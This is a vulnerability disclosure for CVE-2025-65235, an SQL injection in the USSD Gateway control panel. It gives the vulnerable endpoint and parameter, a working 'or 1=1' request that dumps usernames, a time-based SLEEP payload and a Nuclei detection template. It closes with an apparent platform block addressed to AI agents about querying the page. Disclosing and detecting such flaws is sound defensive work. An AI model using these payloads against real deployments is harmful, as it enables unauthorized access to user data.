# \[CVE-2025-65235] USSD GW SQL Injection - SubUsers ## Description SQL Injection in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems ](https://opencode.com/) allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands. \ ## Application Details * **Name**: USSD Gateway * **Vendor**: OpenCode Systems * **Version**: OC Release 5 - Version 6.13.11 ## Technical Details * **Vulnerable Endpoint**: `/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider` * **Vulnerable Parameter**: `account_id` * **Payload Sample:** `account_id=1; SELECT SLEEP(5)#` ## Exploitation The default request is being used to get the username of the account details based on the account ID, the response is shown below ```http POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2 Host: DOMAIN Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest [...] account_id=1 ``` ```http HTTP/2 200 OK [...] {"1" :"USERNAME" } ``` By appending the payload to the parameter, all the usernames will be shown in the response. > You can use different payloads, the below one was used as a POC ```http POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2 Host: DOMAIN Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest [...] account_id=1\+or+1=1--+- ``` ```http HTTP/2 200 OK [...] { "1" : "Username", "3" : "Username", "4" : "Username", "5" : "Username", "6" : "Username", "7" :"Username", "8" : "Username", "9" :"test Username" ," 10" :"Username" ,"11" :"Username" ," 12" :"Username" ,"13" :"Username" , " 14" :"mu[...]1","15":"mu[...]2" ,"16" :"mu[...]3" ,"17" :"mu[...]4" ,"18" :"mu[...]5" [...] } ``` ## Nuclei Template You can use this template for easy detection. ```yaml id: ocpanel-ussdgw-sqli info: name: USSD Gateway OCP Control Panel SQL Injection author: Eslam Ali Akl severity: high description: | Time-based SQL injection test for the getSubUsersByProvider endpoint. Injects a SLEEP(5) payload into the account_id parameter and flags the target if the response time indicates the SQL sleep was executed. tags: [sqli, time-based, ocpanel] requests: - id: time_inject method: POST path: - "{{BaseURL}}/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider" headers: Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" X-Requested-With: "XMLHttpRequest" User-Agent: "nuclei-scan" body: "account_id=1; SELECT SLEEP(5)#" matchers: - type: dsl dsl: - "duration >= 4" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65235-ussd-gw-sql-injection-subusers.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.